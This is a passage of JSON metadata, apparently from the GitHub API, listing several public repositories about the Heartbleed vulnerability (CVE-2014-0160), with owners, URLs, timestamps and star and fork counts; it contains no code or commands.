"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [
"cve-2014-0160",
"exploit",
"heartbeat",
"heartbleed",
"proof-of-concept",
"tls",
"vulnerability"
],
"visibility": "public",
"forks": 0,
"watchers": 5,
"score": 0,
"subscribers_count": 2
},
{
"id": 632561462,
"name": "heartbleed-checker",
"full_name": "cbk914\/heartbleed-checker",
"owner": {
"login": "cbk914",
"id": 2042196,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4",
"html_url": "https:\/\/github.com\/cbk914",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/cbk914\/heartbleed-checker",
"description": "Check for CVE-2014-0160 ",
"fork": false,
"created_at": "2023-04-25T17:00:25Z",
"updated_at": "2024-05-17T14:26:04Z",
"pushed_at": "2024-05-17T14:26:00Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 634550740,
"name": "CVE-2014-0160-Chrome-Plugin",
"full_name": "MrE-Fog\/CVE-2014-0160-Chrome-Plugin",
"owner": {
"login": "MrE-Fog",
"id": 114317320,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114317320?v=4",
"html_url": "https:\/\/github.com\/MrE-Fog",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/MrE-Fog\/CVE-2014-0160-Chrome-Plugin",
"description": null,
"fork": false,
"created_at": "2023-04-30T13:56:47Z",
"updated_at": "2023-04-30T13:56:47Z",
"pushed_at": "2023-04-30T13:57:17Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 672705203,
"name": "cve-2014-0160-heartbleed",
"full_name": "timsonner\/cve-2014-0160-heartbleed",
"owner": {
"login": "timsonner",
"id": 66705347,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66705347?v=4",
"html_url": "https:\/\/github.com\/timsonner",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/timsonner\/cve-2014-0160-heartbleed",
"description": null,
"fork": false,
"created_at": "2023-07-31T01:12:02Z",
"updated_at": "2023-07-31T01:13:29Z",
"pushed_at": "2023-07-31T01:13:26Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 860467967,
"name": "CVE-2014-0160-HeartBleed",
"full_name": "Yash-Thakkar77\/CVE-2014-0160-HeartBleed",
"owner": {
"login": "Yash-Thakkar77",
"id": 117845673,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117845673?v=4",
"html_url": "https:\/\/github.com\/Yash-Thakkar77",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/Yash-Thakkar77\/CVE-2014-0160-HeartBleed",
"description": null,
"fork": false,
"created_at": "2024-09-20T13:44:54Z",
"updated_at": "2024-09-20T13:58:28Z",
"pushed_at": "2024-09-20T13:58:25Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
}
]